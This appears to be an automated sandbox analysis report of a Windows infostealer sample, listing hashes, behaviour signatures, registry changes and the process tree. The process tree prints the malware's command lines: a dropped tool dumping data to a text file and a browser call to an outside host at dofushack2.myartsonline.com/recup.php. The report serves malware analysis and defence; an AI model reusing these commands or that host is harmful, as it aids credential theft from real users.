Analysis
-
max time kernel
135s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2022 16:05
Behavioral task
behavioral1
Sample
652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe
Resource
win7-20220812-en
General
-
Target
652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe
-
Size
220KB
-
MD5
6e1218085443b5d66f82cb98f9cca0b5
-
SHA1
729ceb8815d87ef87a19a2bcdcba63ca35e85283
-
SHA256
652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476
-
SHA512
37b5016e6dbee243b8480c817457d72fb9a0cb78a725c010dfa50b219de560f44bb60e021abd5b55cbc62886581315b8c5aa1d1c645602512040e3c8b04de452
-
SSDEEP
6144:EB9gvxc8jCA4AnyDfbmtezMP3P5HXt73:1eTMyDKtezMhHd
Malware Config
Signatures
-
Nirsoft 1 IoCs
resource yara_rule behavioral2/memory/4788-136-0x0000000000400000-0x0000000000425000-memory.dmp Nirsoft -
Executes dropped EXE 1 IoCs
pid Process 4788 86380.exe -
resource yara_rule behavioral2/memory/1260-132-0x0000000000400000-0x000000000047B000-memory.dmp upx behavioral2/files/0x0006000000022e1f-134.dat upx behavioral2/files/0x0006000000022e1f-135.dat upx behavioral2/memory/4788-136-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral2/memory/1260-137-0x0000000000400000-0x000000000047B000-memory.dmp upx behavioral2/memory/1260-138-0x0000000000400000-0x000000000047B000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\86380.exe 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe File created C:\Windows\86380.txt 86380.exe File created C:\Windows\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe.txt 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1444546808" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0db3b60b009d901 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001008" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377123042" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{8155DF99-75A3-11ED-B696-D2D0017C8629} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0d10d61b009d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000efe01d9a4fdaa14391cb459155b100aa00000000020000000000106600000001000020000000e63e08afdbc48c10d1075aae6bab40bb5df3837659cf744515fee02b1b45d535000000000e80000000020000200000006cf5cd42344a7e01088f5469c87a3813da069c96dba42d4007e9de4283934c3620000000242af2914b03d5f32dbfdcb257b7bb846192215186eb8fc4f4c1821b4bdfd0bc400000000460462bc0c3ced89e9b88f2d64a81ac52f57b2687c69b68a696376966016af01904f3e51d7a0895b6bf9059ae3929f6f7433758945f3116c79f64a90100c968 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31001008" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1444546808" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000efe01d9a4fdaa14391cb459155b100aa000000000200000000001066000000010000200000003d1638e292ba70da5a83699f5c92cf47aef568910a47822991ff4011f63bc40a000000000e800000000200002000000006970bb1ee8cd9bcce4593339c2ac2ef502a3b04e36de61a7a70c74464830aea2000000001f77626e605b800aeaaf8ca41afa52c5d7e2f2f770a287c42318245b0f4f36740000000c974f2451e2bef5b98ea4bebb0e5b290ca78cabdde75dc02befb4078443c5d0260e23379a0f90991998261ae0a17009a077e8362295330dcf4146f3b8607428b iexplore.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4788 86380.exe 4788 86380.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2140 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4788 86380.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2140 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2140 iexplore.exe 2140 iexplore.exe 4156 IEXPLORE.EXE 4156 IEXPLORE.EXE 4156 IEXPLORE.EXE 4156 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1260 wrote to memory of 4788 1260 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 83 PID 1260 wrote to memory of 4788 1260 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 83 PID 1260 wrote to memory of 4788 1260 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 83 PID 1260 wrote to memory of 2140 1260 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 84 PID 1260 wrote to memory of 2140 1260 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 84 PID 2140 wrote to memory of 4156 2140 iexplore.exe 85 PID 2140 wrote to memory of 4156 2140 iexplore.exe 85 PID 2140 wrote to memory of 4156 2140 iexplore.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe"C:\Users\Admin\AppData\Local\Temp\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\86380.exe"C:\Windows\86380.exe" /stext C:\Windows\86380.txt2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://dofushack2.myartsonline.com/recup.php?actif=Le_serveur_Dofus Conf_est_activé2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2140 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4156
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63KB
MD5113417b6a1a108eb22337602661e7a59
SHA1c89f17a24058a33851d02561bcdae48f327c18c5
SHA256152374899c00e31678b5d627e4d05ff877f59cce3319cc024c25cf3bf40302a2
SHA512182732b7853e0a28c73ea44a7e0c2ada764d74bb9010358d78ae4edd7829140d73af7d1ad7544a973ccff6f442593d5697ae792f604f410e8a35c9d18a680e88
-
Filesize
63KB
MD5113417b6a1a108eb22337602661e7a59
SHA1c89f17a24058a33851d02561bcdae48f327c18c5
SHA256152374899c00e31678b5d627e4d05ff877f59cce3319cc024c25cf3bf40302a2
SHA512182732b7853e0a28c73ea44a7e0c2ada764d74bb9010358d78ae4edd7829140d73af7d1ad7544a973ccff6f442593d5697ae792f604f410e8a35c9d18a680e88